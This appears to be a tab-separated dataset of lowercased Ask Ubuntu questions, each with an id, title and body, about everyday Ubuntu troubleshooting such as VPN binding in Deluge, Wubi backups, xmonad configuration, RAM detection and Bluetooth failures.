137670	can not bind deluge to vpn	i created a vpn by using $ nslookup vpn.ipredator.se to find the ipredator ip address to use ( eg 93.182.174.130 ) - i didn ' t use `` vpn.ipredator.se '' as the gateway in the network manager applet , because that did n't work on 10.04 . the vpn works fine , but when i try to bind deluge to the vpn ip address ( via edit - > preferences - > network - > interface ) i get this tracker error : '' openbittorrent.com : error : can not assign requested address '' , and there are no connections . other applications still work over the vpn . when i remove the ip address from the interface box and click apply , deluge works fine . i am using 12.04 64 bit ( classic ) and i had the same problem with 10.04 deluge 1.3.5 i 'm only after a way to stop my ip address leaking when the vpn cuts out . this seems like the simplest method ( if it would work ) , but i 'm open to other methods . i 'm not comfortable with ip tables , but from what i can gather i can assign a range of ports for deluge to use , and then use gufw to only allow traffic on those ports to the ipredator server . i guess this is a deluge bug , or a quirk of how trackers work . anyone else had the same issues ? any ideas for troubleshooting ?
137671	what does this mean `` you do n't have permissions for /dev/ttyacm1 device ! `` ?	i have been trying to connect my nokia e65 phone to my ubuntu 12.04 via wammu . i tried the option of `` automatically search the phone '' . but i get the error messages like this in the screen : wammu is now searching for phone : you do n't have permissions for /dev/ttys0 device ! you do n't have permissions for /dev/ttys1 device ! you do n't have permissions for /dev/ttys2 device ! you do n't have permissions for /dev/ttys3 device ! you do n't have permissions for /dev/ttys4 device ! you do n't have permissions for /dev/ttys5 device ! you do n't have permissions for /dev/ttys6 device ! you do n't have permissions for /dev/ttys7 device ! you do n't have permissions for /dev/ttys8 device ! you do n't have permissions for /dev/ttys9 device ! you do n't have permissions for /dev/ttys10 device ! you do n't have permissions for /dev/ttys11 device ! you do n't have permissions for /dev/ttys12 device ! you do n't have permissions for /dev/ttys13 device ! you do n't have permissions for /dev/ttys14 device ! you do n't have permissions for /dev/ttys15 device ! you do n't have permissions for /dev/ttys16 device ! you do n't have permissions for /dev/ttys17 device ! you do n't have permissions for /dev/ttys18 device ! you do n't have permissions for /dev/ttys19 device ! you do n't have permissions for /dev/ttyacm0 device ! you do n't have permissions for /dev/ttyacm1 device ! discovering bluetooth devices using pybluez could not access bluetooth subsystem ( error accessing bluetooth device ) all finished , found 0 phones no phone has been found ! what does this mean ? how to overcome this error ? thanks in advance .
137680	i can'nt install zend studio 7.2.1	i can'nt install zend studio 7.2.1 the error is like this preparing to install ... extracting the jre from the installer archive ... unpacking the jre ... extracting the installation resources from the installer archive ... configuring the installer for this system 's environment ... strings : '/lib/libc.so.6 ' : no such file launching installer ... zendstudio7_2_1.bin : 2479 : exec : /tmp/install.dir.4666/linux/resource/jre/bin/java : not found
137682	backup of wubi installation	i have installed ubuntu 12.04 with wubi on windows 7 32 bit . i want to do a backup of my whole installation of wubi ( all the files , configurations and programs i installed ) , so in case of something going wrong i can go back to the backup and have all as before ( and not install all again from zero ) . is that possible ? i like to test a lot of things , and with that , sometimes i end crashing things , so that 's why i 'd like to have some backup . i read in http : //wiki.ubuntu.com/wubiguide that i should make a copy of the root.disk , but i 'm not sure ... when i copy it back to the /ubuntu folder there 's any risk of something going wrong ? ( grub issues or something like that ) . thanks in advance , and sorry for my ignorance .
137684	how can i write ubuntu apps in java ?	i am new to linux . i want to develop apps for ubuntu desktop and mobile using java .
137685	how can i get xmonad to work with gnome 3 ?	how can i get xmonad to work with gnome 3 ? -sidenote , some commands like recompile xmonad ( alt+q ) and quitting ( alt+shift+q ) and dmenu ( alt+p ) didnt work unless i added them to my xmonad.hs file , while the other commands did work . but then , the rest of the commands like switching between workspaces , opening terminal , changing layouts didnt work , so know i had to add all of them , weird . import xmonad import xmonad.config.gnome import system.exit import qualified data.map as m import qualified xmonad.stackset as w mykeys conf @ ( xconfig { xmonad.modmask = modm } ) = m.fromlist $ -- launch dmenu [ ( ( modm , xk_p ) , spawn `` exe=`dmenu_path | dmenu` & & eval \ '' exec $ exe\ '' '' ) -- start a terminal . terminal to start is specified by myterminal variable . , ( ( modm .| . shiftmask , xk_return ) , spawn `` gnome-terminal '' ) -- rotate through the available layout algorithms , ( ( modm , xk_space ) , sendmessage nextlayout ) -- reset the layouts on the current workspace to default , ( ( modm .| . shiftmask , xk_space ) , setlayout $ xmonad.layouthook conf ) -- resize viewed windows to the correct size , ( ( modm , xk_n ) , refresh ) -- move focus to the next window , ( ( modm , xk_tab ) , windows w.focusdown ) -- move focus to the next window , ( ( modm , xk_j ) , windows w.focusdown ) -- move focus to the previous window , ( ( modm , xk_k ) , windows w.focusup ) -- move focus to the master window , ( ( modm , xk_m ) , windows w.focusmaster ) -- swap the focused window and the master window , ( ( modm , xk_return ) , windows w.swapmaster ) -- swap the focused window with the next window , ( ( modm .| . shiftmask , xk_j ) , windows w.swapdown ) -- swap the focused window with the previous window , ( ( modm .| . shiftmask , xk_k ) , windows w.swapup ) -- shrink the master area , ( ( modm , xk_h ) , sendmessage shrink ) -- expand the master area , ( ( modm , xk_l ) , sendmessage expand ) -- push window back into tiling , ( ( modm , xk_t ) , withfocused $ windows . w.sink ) -- increment the number of windows in the master area , ( ( modm , xk_comma ) , sendmessage ( incmastern 1 ) ) -- deincrement the number of windows in the master area , ( ( modm , xk_period ) , sendmessage ( incmastern ( -1 ) ) ) -- close focused window , ( ( modm .| . shiftmask , xk_c ) , kill ) -- quit xmonad , ( ( modm .| . shiftmask , xk_q ) , io ( exitwith exitsuccess ) ) -- restart xmonad , ( ( modm , xk_q ) , spawn `` xmonad -- recompile ; xmonad -- restart '' ) ] ++ [ ( ( m .| . modm , k ) , windows $ f i ) | ( i , k ) < - zip ( xmonad.workspaces conf ) [ xk_1 .. xk_9 ] , ( f , m ) < - [ ( w.greedyview , 0 ) , ( w.shift , shiftmask ) ] ] mymanagehook = composeall ( [ managehook gnomeconfig , classname = ? `` unity-2d-panel '' -- > doignore , classname = ? `` unity-2d-launcher '' -- > dofloat ] ) main = xmonad gnomeconfig { managehook = mymanagehook , keys = mykeys } /usr/share/gnome-session/sessions/xmonad.session [ gnome session ] name=xmonad/gnome requiredcomponents=gnome-settings-daemon ; requiredproviders=windowmanager ; notifications ; defaultprovider-windowmanager=xmonad defaultprovider-notifications=notification-daemon /usr/share/xsessions/xmonad [ desktop entry ] name=xmonad/gnome comment=tiling window manager exec=gnome-session -- session=xmonad tryexec=/usr/bin/gnome-session type=xsession
137686	how to re-install gimp 2.6 after trying gimp 2.8 ?	ok ... i tried gimp 2.8 , but felt more comfortable with 2.6 . i removed the ppa 's from ubuntu software centre , removed and purged gimp , and even rm the .gimp-2.8 folder . but when i go to install gimp via terminal or the software centre i encounter this problem . i know i should have known better , i had a very similar problem with 2.7 . i tried those suggestions that worked for me last time , but i can not get 2.6 back , see below for my error . i am using ubuntu 12.04 32 bit . thank you for your time and answers .
137687	looking for a notes management software	i 'm looking for a simple note management software , support searching article by title , any recommendations ? best not kde 's .
137688	command-line torrent client that supports multi-tracker extension the way utorrent does it	i 've tried many torrent clients available in the repositories , but have n't found any that support the multi-tracker extension ( bep-012 ) the way it is implemented in utorrent . that is , when there is a list of trackers , utorrent uses peers from all of them , but linux clients use only from the first available tracker . is there any command-line clients ( preferably native linux ) that support the libtorrent multi-tracker feature the way utorrent does ?
137699	how can i disable kubuntu 12.04 home folder encryption ?	i use kubuntu 12.04 . it 's a relatively new install and when i created my account i had the option to have it encrypt my home folder . i chose to do that . now i would like to turn that off . i opened up the system settings app and went through every single setting in there and it does n't appear there is any way to reverse this process . is it impossible ? also , after i disable home folder encryption i would like to set up full disk encryption . i installed truecrypt only to find that it only supports full disk encryption with windows ( ugh ... ) . how would i go about setting this up ? why is this so unintuitive ?
137702	why ca n't i execute wubi in windows 8 consumer preview ?	i tried executing windows installer for ubuntu desktop but it wo n't execute . i tried downloading it again , executing as administrator etc but nothing happens . i think something is wrong with my laptop . i 'm using windows 8 consumer preview .
137703	12.04 too slow ( asus 1215b )	i have recently installed ubuntu 12.04 on my asus 1215b ( on formatted hdd ) and it seems to work even more slowly than win7 . htop says that system load is low and after some updates compiz now wo n't eating 50 % cpu time . even in 2d system is slow -why ? ( ati drivers do n't installed - because ubuntu is starting to die under them )
137704	how to install java and enable java plug in for firefox in ubuntu 12.04lts ?	please help me to install java and enable java plug in for firefox . i tried tools-add-ons-plugins . but i do n't know how to do ?
137706	gnome-terminal and solarized theme coloring	i tried to apply solarized color theme to my gnome terminal , like explained here . but its all greyed out and not that colorful as expected . see here any idea what i can do ?
137707	defragmenting tools on ubuntu for non ext* formats	i have a flash drive that i use for general use around the house and at school . i use exclusively ubuntu , but at school and on other family computers , they use winblows . therefore , my flash drive is in fat32 format for easy reading on both types of machines . however , i want to be sure that my drive can be defragmented . is there any way to do this on ubuntu ?
137710	how many computer i can connect to landscape if i buy only one ubuntu advantage subscription ?	i want to buy 1 year ubuntu advantage subscription for 1 desktop . i actually do not need support , but i need landscape . i want to manage all my office computers through landscape . are there any limitations in ladscape ? how many computer can i connect to ladscape ?
137712	how to interpret errors.ubuntu.com graph data ?	the graph and bar chart at the ubuntu error reports page seem to contain a lot of information . but i 'm puzzled about the meaning of some of the values , and the page does n't refer to any documentation . what does the `` frequency '' column measure , in what units ? what does the `` mean time between failure '' vertical axis on the graph mean ? what do the `` if all updates were installed '' vs `` actual '' toggle mean ? for me , clicking `` actual '' just blanks the whole graph . where is the code that generates the page ? update : and where does the data come from ? is this related to errortracker : how can i track a bug that caused a crash and was reported via apport / whoopsie ? ?
137715	make libreoffice a single button that when clicked offers choices and what type of document to open	i know that i 've done this on a previous install of ubuntu , but for the life of me , i ca n't find it . basically i want the options like when you right click libreoffice writer and the new document option appears . i 'd just like them all combined so that there is new spreadsheet , new presentation etc . appreciate any help in this matter . -i 'd like there to be a single libreoffice button on the left hand side dock ( where it is off a fresh install with the three different colored libreoffice buttons ) . -then once i left click it , it will boot up libreoffice writer but if i right click it , it gives me the option of what file type i 'd like to open ( similar too the new document or new spreadsheet that appears now . just all in one. ) . i would just get rid of it and only deal with it through the terminal but i share the computer with my younger brother . this means that my uncluttering needs to be done so that it still allows him easy access .
137716	how can i install codecs on my ubuntu iso ?	i would like to install codecs and all the restricted media jazz for all my non internet connected ubuntu users who would like to upgrade . how can i best do this ?
137722	cuda on ubuntu 11.10 mactel	can anyone please point me to a tutorial or give me directions how to make my machine cuda ready without crashing my system ? tried it once with the cuda guide on the nvidia site but that is not for ubuntu 11.10 and had to reboot the whole system . using ubuntu 11.10 on a macbook pro released in 2009 .
137724	change color of top menu bar in unity and top menu bar in any window ( application and file explorer )	how can i change the color of top menu bar in unity and top menu bar in any window ( application and file explorer ) ?
137731	how can i recover my home folder and log in again after accidentally moving in into `` lost+found '' ?	i use ubuntu 12.04 . i just curiously transferred 'my-username ' folder into `` lost+found '' folder ( which is normally locked ) , so that anyone from other user account can not access my files . but , after restart i just ca n't log in to my account . i have lots of important files and software installed . what can i do now ? is there any way to recover my home folder from the `` lost+found '' folder ?
137744	how can i create a backup file . iso like edubuntu ?	i want to create a dvd boot can setup like edubuntu boot . this is the second time i have installed edubuntu on my pc , but every time i install , i have to upgrade all packages and language . ( almost 400 - 500 mb ) . is it possible to make a bootable dvd of my current installation so that i do n't have to upgrade all the packages next time ? ( it can use for usd boot too )
137747	acer aspire heats up in ubuntu 10.10	i have an acer aspire 4820tg . it heats up in ubuntu while remains cool in windows 7 . consequently , the battery backup in ubuntu is very low . why is it so ? i have ati mobility radeon hd 5650 graphic card on my machine . is there a way to solve this problem ?
137759	how to edit mime types on precise	in precise , when i try to change default icon for a specific file type with assogiate , there is no effects ; not even if i try this operation under root rights . are there some workarounds known for this problem ? thanks in advance !
137764	is there anyway to create screen space for plank dock like in mac os x ?	i want plank to work like the dock in mac os x ( and gnome panel-docklet 13 ) so that maximised windows wo n't cover the dock .
137768	how to conserve/copy perl 5.12 installation before upgrading to ubuntu 12.04 ?	ubuntu 12.04 is out , and i want to upgrade . however , i need to conserve my existing perl 5.12 installation before upgrading . on 12.04 , there is perl 5.14 and i would need to reinstall lots of perl modules . i better copy my existing perl installation before ugrading , because the installer will remove the old perl stuff and i can not determine what i need when the 5.12 modules are gone . any ideas how to do this ? i have a mix of modules installed from repos , from cpanm , from cpan , and from source . i need a strategy to determine a comprehensive list of my perl modules , their respective origins a sequence in which order to proceed . advice on what to do in case a certain module is not yet available in 5.14. advice on which environment variables and paths to change .
137773	monitor configured outside of supported operating frequencies	i am using ubuntu 12.04 lts . i have a lg crt flatron e700sh model monitor , and whenever i log into ubuntu i get a message saying : out of frequency hf:92.7khz vf:58.0 hz operating frequency hf:30-70khz vf:50-160 hz please help me solve this problem if anyone knows it because i tried many of solutions . i have also tried switching to tty1 through ctrl+alt+f2 without success .
137774	preferred location for web app files , outside of /var/www	i am very new to linux , and i just installed ubuntu . it really is exciting and i already installed my own apache and mysql . the server is running . i have my website 's files under /var/www but some files are excluded from user access . in my windows environment i put them under c : /special and i wish to know where i should put them under ubuntu .
137776	starting multiple applications using a shell script	i need to open thunderbird , pidgin and firefox when i execute the a .sh file in terminal . currently i simply added these app names one by one below and when executing the file it open the first application only and when i close the first app it will open the second app like that . actually i need to open these 3 app without closing others .
137777	why can i not access any of the options when using dconf-editor ?	i recently installed dconf editor from the software centre . but when i launch it i am unable to navigate any of the options , clicking any of the entries in the tree on the left does not expand the menus . am i missing something really obvious ?
137778	ubuntu detects only 3.6gb ram ( of 8 gigas ) on a 64bit os ( 11.04 )	the bios detects it fine and shows 8gb . even lshw shows 8gb memory but somehow only 3.6gb is usable . output of uname -a linux prod 2.6.38-15-generic # 59-ubuntu smp fri apr 27 16:03:32 utc 2012 x86_64 x86_64 x86_64 gnu/linux free -m total used free shared buffers cached mem : 3646 3047 598 0 164 1126 -/+ buffers/cache : 1756 1889 swap : 1950 0 1950 output of cat /proc/meminfo cat /proc/meminfo memtotal : 3734456 kb memfree : 603272 kb buffers : 161716 kb cached : 1146076 kb swapcached : 0 kb active : 2027604 kb inactive : 847844 kb active ( anon ) : 1568608 kb inactive ( anon ) : 11472 kb active ( file ) : 458996 kb inactive ( file ) : 836372 kb unevictable : 32 kb mlocked : 32 kb swaptotal : 1997820 kb swapfree : 1997820 kb dirty : 224 kb writeback : 0 kb anonpages : 1567788 kb mapped : 171708 kb shmem : 12432 kb slab : 105832 kb sreclaimable : 84272 kb sunreclaim : 21560 kb kernelstack : 3248 kb pagetables : 35304 kb nfs_unstable : 0 kb bounce : 0 kb writebacktmp : 0 kb commitlimit : 3865048 kb committed_as : 3796728 kb vmalloctotal : 34359738367 kb vmallocused : 110684 kb vmallocchunk : 34359623932 kb hardwarecorrupted : 0 kb hugepages_total : 0 hugepages_free : 0 hugepages_rsvd : 0 hugepages_surp : 0 hugepagesize : 2048 kb directmap4k : 47648 kb directmap2m : 3751936 kb output of lshw description : mini tower computer product : dell dm051 vendor : winbond electronics serial : djfk62j width : 64 bits capabilities : smbios-2.3 dmi-2.3 vsyscall64 vsyscall32 configuration : administrator_password=enabled boot=normal chassis=mini-tower power-on_password=enabled uuid=44454c4c-4a00-1046-804b-c4c04f36324a *-core description : motherboard product : 0wg261 vendor : winbond electronics physical id : 0 serial : ..cn69861613155f . *-firmware description : bios vendor : winbond electronics physical id : 0 version : a04 date : 02/03/2006 size : 64kib capacity : 448kib capabilities : pci pnp apm upgrade shadowing cdboot bootselect edd int13floppytoshiba int5printscreen int9keyboard int14serial int17printer acpi usb ls120boot biosbootspecification netboot *-cpu description : cpu product : intel ( r ) pentium ( r ) 4 cpu 2.80ghz vendor : intel corp. physical id : 400 bus info : cpu @ 0 slot : microprocessor size : 2800mhz capacity : 4ghz width : 64 bits clock : 800mhz capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx x86-64 constant_tsc pebs bts nopl pni dtes64 monitor ds_cpl cid cx16 xtpr lahf_lm *-cache:0 description : l1 cache physical id : 700 size : 16kib capacity : 16kib capabilities : internal write-back data *-cache:1 description : l2 cache physical id : 701 size : 1mib capacity : 1mib capabilities : internal varies unified *-memory description : system memory physical id : 1000 slot : system board or motherboard size : 8gib *-bank:0 description : dimm ddr synchronous 533 mhz ( 1.9 ns ) vendor : kingston physical id : 0 serial : 6827d91e slot : dimm_1 size : 2gib width : 64 bits clock : 533mhz ( 1.9ns ) *-bank:1 description : dimm ddr synchronous 533 mhz ( 1.9 ns ) vendor : kingston physical id : 1 serial : 2a27e813 slot : dimm_3 size : 2gib width : 64 bits clock : 533mhz ( 1.9ns ) *-bank:2 description : dimm ddr synchronous 533 mhz ( 1.9 ns ) vendor : kingston physical id : 2 serial : 2a27d213 slot : dimm_2 size : 2gib width : 64 bits clock : 533mhz ( 1.9ns ) *-bank:3 description : dimm ddr synchronous 533 mhz ( 1.9 ns ) vendor : kingston physical id : 3 serial : 69270c1f slot : dimm_4 size : 2gib width : 64 bits clock : 533mhz ( 1.9ns ) *-pci description : host bridge product : 82945g/gz/p/pl memory controller hub vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 02 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : 82945g/gz/p/pl pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : d000 ( size=4096 ) memory : efd00000-efefffff ioport : ec000000 ( size=33554432 ) *-display:0 description : vga compatible controller product : rv370 5b60 [ radeon x300 ( pcie ) ] vendor : ati technologies inc physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:43 memory : ec000000-edffffff memory : efde0000-efdeffff ioport : dc00 ( size=256 ) memory : efe00000-efe1ffff *-display:1 unclaimed description : display controller product : rv370 [ radeon x300se ] vendor : ati technologies inc physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress bus_master cap_list configuration : latency=0 resources : memory : efdf0000-efdfffff *-multimedia description : audio device product : n10/ich 7 family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:42 memory : efffc000-efffffff *-pci:1 description : pci bridge product : n10/ich 7 family pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 01 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport:1000 ( size=4096 ) memory : efc00000-efcfffff ioport : f4000000 ( size=2097152 ) *-usb:0 description : usb controller product : n10/ich 7 family usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:21 ioport : ff80 ( size=32 ) *-usb:1 description : usb controller product : n10/ich 7 family usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:22 ioport : ff60 ( size=32 ) *-usb:2 description : usb controller product : n10/ich 7 family usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:18 ioport : ff40 ( size=32 ) *-usb:3 description : usb controller product : n10/ich 7 family usb uhci controller # 4 vendor : intel corporation physical id : 1d.3 bus info : pci @ 0000:00:1d.3 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport : ff20 ( size=32 ) *-usb:4 description : usb controller product : n10/ich 7 family usb2 ehci controller vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 01 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:21 memory : ffa80800-ffa80bff *-pci:2 description : pci bridge product : 82801 pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : e1 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list resources : ioport : c000 ( size=4096 ) memory : efb00000-efbfffff *-network description : ethernet interface product : n10/ich 7 family lan controller vendor : intel corporation physical id : 8 bus info : pci @ 0000:03:08.0 logical name : eth0 version : 01 serial : 00:13:72 : b1:12:43 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=full firmware=n/a ip=192.168.0.77 latency=64 link=yes maxlatency=56 mingnt=8 multicast=yes port=mii speed=100mbit/s resources : irq:20 memory : efbff000-efbfffff ioport : ccc0 ( size=64 ) *-isa description : isa bridge product : 82801gb/gr ( ich7 family ) lpc interface bridge vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 01 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-ide:0 description : ide interface product : 82801g ( ich7 family ) ide controller vendor : intel corporation physical id : 1f.1 bus info : pci @ 0000:00:1f.1 logical name : scsi0 version : 01 width : 32 bits clock : 33mhz capabilities : ide bus_master emulated configuration : driver=ata_piix latency=0 resources : irq:16 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : ffa0 ( size=16 ) *-cdrom:0 description : dvd reader product : dvd-rom ts-h352c vendor : tsstcorp physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/cdrom logical name : /dev/dvd logical name : /dev/scd0 logical name : /dev/sr0 version : de02 capabilities : removable audio dvd configuration : ansiversion=5 status=nodisc *-cdrom:1 description : cd-r/cd-rw writer product : cd-rw crx217e vendor : sony physical id : 0.1.0 bus info : scsi @ 0:0.1.0 logical name : /dev/cdrom1 logical name : /dev/cdrw1 logical name : /dev/scd1 logical name : /dev/sr1 version : 1ds2 capabilities : removable audio cd-r cd-rw configuration : ansiversion=5 status=nodisc *-ide:1 description : ide interface product : n10/ich7 family sata ide controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi2 version : 01 width : 32 bits clock : 66mhz capabilities : ide pm bus_master cap_list emulated configuration : driver=ata_piix latency=0 resources : irq:20 ioport : fe00 ( size=8 ) ioport : fe10 ( size=4 ) ioport : fe20 ( size=8 ) ioport : fe30 ( size=4 ) ioport : fea0 ( size=16 ) memory : f4200000-f42003ff *-disk description : ata disk product : st380819as vendor : seagate physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/sda version : 8.04 serial : 5mr6fvhf size : 74gib ( 80gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=0008bd03 *-volume:0 description : ext3 volume vendor : linux physical id : 1 bus info : scsi @ 2:0.0.0,1 logical name : /dev/sda1 logical name : /boot version : 1.0 serial : be85d45c-4ab6-457c-8ab6-009098158232 size : 476mib capacity : 476mib capabilities : primary bootable journaled extended_attributes recover ext3 ext2 initialized configuration : created=2012-04-30 17:49:56 filesystem=ext3 modified=2012-05-15 15:46:35 mount.fstype=ext3 mount.options=rw , relatime , errors=continue , commit=5 , barrier=0 , data=ordered mounted=2012-05-15 15:46:35 state=mounted *-volume:1 description : ext4 volume vendor : linux physical id : 2 bus info : scsi @ 2:0.0.0,2 logical name : /dev/sda2 logical name : / version : 1.0 serial : fae37d7d-cc93-4718-9cfb-9aafd4a820c7 size : 19gib capacity : 19gib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2012-04-30 17:49:58 filesystem=ext4 lastmountpoint=/ modified=2012-05-07 07:19:32 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , barrier=1 , data=ordered mounted=2012-05-16 08:02:52 state=mounted *-volume:2 description : extended partition physical id : 3 bus info : scsi @ 2:0.0.0,3 logical name : /dev/sda3 size : 54gib capacity : 54gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume:0 description : linux filesystem partition physical id : 5 logical name : /dev/sda5 logical name : /home capacity : 53gib configuration : mount.fstype=ext4 mount.options=rw , relatime , barrier=1 , data=ordered state=mounted *-logicalvolume:1 description : linux swap / solaris partition physical id : 6 logical name : /dev/sda6 capacity : 1951mib capabilities : nofs *-serial unclaimed description : smbus product : n10/ich 7 family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 01 width : 32 bits clock : 33mhz configuration : latency=0 resources : ioport : ece0 ( size=32 ) *-scsi physical id : 1 bus info : usb @ 1:3 logical name : scsi4 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk:0 description : scsi disk product : usb hs-cf card vendor : teac physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/sdb version : 4.00 capabilities : removable *-medium physical id : 0 logical name : /dev/sdb *-disk:1 description : scsi disk product : usb hs-xd/sm vendor : teac physical id : 0.0.1 bus info : scsi @ 4:0.0.1 logical name : /dev/sdc version : 4.00 capabilities : removable *-medium physical id : 0 logical name : /dev/sdc *-disk:2 description : scsi disk product : usb hs-ms card vendor : teac physical id : 0.0.2 bus info : scsi @ 4:0.0.2 logical name : /dev/sdd version : 4.00 serial : 3 capabilities : removable *-medium physical id : 0 logical name : /dev/sdd *-disk:3 description : scsi disk product : usb hs-sd card vendor : teac physical id : 0.0.3 bus info : scsi @ 4:0.0.3 logical name : /dev/sde version : 4.00 capabilities : removable *-medium physical id : 0 logical name : /dev/sde output of sudo dmidecode http : //pastebin.com/3pv4rzy6 i cheked this http : //askubuntu.com/questions/82917/ubuntu-detects-only-3-2gb-ram-on-a-64bit-os but i 'm know sure if can be the same problem thanks in advanced
137786	screen artifacts , particularly when scrolling through a webpage or document	when scrolling through a webpage or document , i get `` artifacts '' , for lack of a better word . part of the document will stay in the same spot and i wont be able to read what is under it . since this is hard to describe , i 've included two images to show what i mean . although both of these are from firefox , this also occurs in the pdf reader that comes with ubuntu . if i take a screenshot , the screen will abruptly fix itself before the picture is taken , so i took a picture of it with a camera . example 1 example 2 you can see that in both of these a part of the text repeats itself and is abruptly cut off by the rest of the page . this also occurs in gedit ; when i edit a line , sometimes it will not update other lines until i save the document . i am running ubuntu 12.04 using nvidia-current for my driver . my video card is a nvidia quadro nvs 110m , which i believe is similar to the nvidia go 7300 . i know there were some issues with compiz and this set of gpus on the current drivers for 11.10 , but i do n't know if that has anything to do with this . it occurs on both nvidia-current and nvidia-current-updates . thank you for your time !
137788	problem with deleting libmysqlclient16-dev from repository of 12.04	libmysqlclient16-dev deleted from ubuntu 12.04 repository , is it possible to use libmysqlclient-dev instead of libmysqlclient16-dev or not ? ! ! and all the features of libmysqlclient16-dev are in libmysqlclient-dev or not ? !
137794	why is my bluetooth connection always failing ?	i have a bluetooth headset that has been working fine for about a year . recently it has been failing , and i believe the time it has been problematic coincides with upgrading to 12.04 . the device pairs just fine . however , every time i try to connect , i get an error that says `` connection failed : connect failed '' . i ran blueman-manager from the command line , and got this output ( edited down to just the tail end when the connection failed ) : _________ generate ( /usr/lib/python2.7/dist-packages/blueman/gui/manager/managerdevicemenu.py:230 ) bshsbe04 _________ unset_op ( /usr/lib/python2.7/dist-packages/blueman/gui/manager/managerdevicemenu.py:103 ) op : regenerating instance < managerdevicemenu object at 0x2d16b90 ( gtkmenu at 0x2e5b750 ) > _________ fail ( /usr/lib/python2.7/dist-packages/blueman/gui/manager/managerdevicemenu.py:134 ) fail ( dbusexception ( dbus.string ( u'connect failed ' ) , ) , ) also , based on suggestions , i tried disabling ssp with the following command : sudo hciconfig hci0 sspmode 0 , but it does not seem to have helped . lastly , i have tried unpairing and repairing , and sometimes that gets me some connectivity , but not always , and in any case it 's a hassle to have to repair every single time . what do i need to do to fix this error and restore my bluetooth device to its former level of reliability ?
137802	can not edit after switch back from another application	i experienced a situation which is absolutely weird . many of my applications can suddenly refuse input from my keyboard , but if i click somewhere in the app , i re-type , it works ... for example . i opened my netbeans to edit a php class . it works fine , i 'm happy and i switch to my browser to see result . after i come back to netbeans , i found i can not type anything , if and only if i click around ( whatever in netbeans ) , it will work . so firstly i suppose it should be a netbeans bug . bu unfortunetely , some other applications has similiar issues , for example , mysql workbench , even i come across one to start edit this ticket ... can be re-producted 100 % after lose focus of netbeans then i think it could be an ubuntu bug , other than netbeans , mysql workbench , chrome etc . so , i 'm totally lost . you konw it just annoying and unefficient to work with sth like this . already search around in google , still no luck . my os : ubuntu desktop 12.04 and sth get from uname -a : 3.2.0-23-generic-pae # 36-ubuntu smp tue apr 10 22:19:09 utc 2012 i686 i686 i386 gnu/linux i 'm working on a laptop hp probook 4431s . thanks in advance for any idea .
137807	how to check how long a program/application has been running or has run ?	is it possible to set a timer for a running application and save that data somewhere global ? i am doing some volunteer work in an internet cafe where kids are the main users and we would like to get them to do tux math for 10 minutes which they do n't do because of the many distractions on the internet . so i was wondering if getting the amount of time an application has been run is possible .
